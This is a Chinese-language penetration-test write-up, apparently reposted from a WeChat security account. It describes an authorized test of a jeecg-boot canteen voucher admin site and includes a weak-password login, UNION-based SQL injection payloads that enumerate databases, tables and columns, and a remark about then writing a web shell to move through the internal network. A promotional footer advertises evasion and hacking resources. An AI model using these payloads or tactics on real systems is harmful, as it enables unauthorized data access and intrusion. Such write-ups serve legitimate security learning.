某x研发中心SQL注入 | 实战
2023-5-22 22:27:28 Author: 渗透安全团队(查看原文) 阅读量:35 收藏

由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!

    XDM,太久未见,甚是想念!继续骚操作,继续防护!
一、技术背景
    在某项目授权实战中,对某研发中心的一款后台网站进行漏洞挖掘!以下分享经过该研发中心同意且漏洞已修复完毕,童鞋们禁止进一步打击!若是也有用到相关模板框架的,请立即修复。
二、漏洞细节
1、开局一个登录框,尝试了一波弱口令,真难受!本来要放弃了,不过转头一想会不会是该研发中心的缩写呢,嘿嘿!输入:admin/***yfzx,很好,成功拿下!
2、大概扫描了一波,估计是该研发中心的某食堂的卡券管理中心,这要是被自己内部人员搞一波,这不就包了以后的饭钱了?想想都可怕。
3、浏览了所有功能之后对其对应功能进行疯狂试探,在隐秘的角落发现了这个功能,居然是利用jeecg-boot搭建的,嘿嘿,这不就有搞头了!
4、想起之前这里就爆出过SQL注入的洞,立马尝试了一下。
选择SQL数据集=》新建SQL数据集
5、突然发现该数据信息已经禁止维护了,无法获取到真实的表名,以为没有后续了,突然想起来前面有菜单,那么肯定制定了一定的SQL数据集,这时候翻找了一下前面的菜单功能,找到了表名。
6、接下来就可以一波操作猛如虎了........
#POC#查询所有数据库名select * from 已知表名 WHERE id='' union SELECT 1,2,3,4,5,6,7,8,9,(select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA)#查询所有表名select * from 已知表名 WHERE id='' union SELECT 1,2,3,4,5,6,7,8,9,(select group_concat(table_name) from information_schema.tables where table_schema='查询到的库名')#查询某表的字段名select * from 已知表名 WHERE id='' union SELECT 1,2,3,4,5,6,7,8,9,(select group_concat(column_name) from information_schema.columns where table_schema='查询到的库名' and table_name='查询到的表名')
获取所有库名=》表名=》信息等内容
获取当前用户
之后就可以按照正常思路写shell进行内网遨游咯.......
三、总结
    每一次的运气不是来源于真运气,而是对挖掘漏洞过程的细心摸爬,不放弃任何一个出现的功能点,留意着URL中的关键字眼,往往这些地方都能给你带来惊喜!
    最近XDM还是要记得戴好口罩,我的好兄弟他终于yang了!


付费圈子

欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

加入安全交流群

                               

关 注 有 礼

关注下方公众号回复“666”可以领取一套领取黑客成长秘籍

 还在等什么?赶紧点击下方名片关注学习吧!


干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247505195&idx=2&sn=8f426b9611bee99d9f7ded73d5f4a732&chksm=c1762884f601a1925febc1bcde3fa29a3a8c258e2f28832ec205bbaa7ae0ac8e3869dfa3caaa#rd
如有侵权请联系:admin#unsafe.sh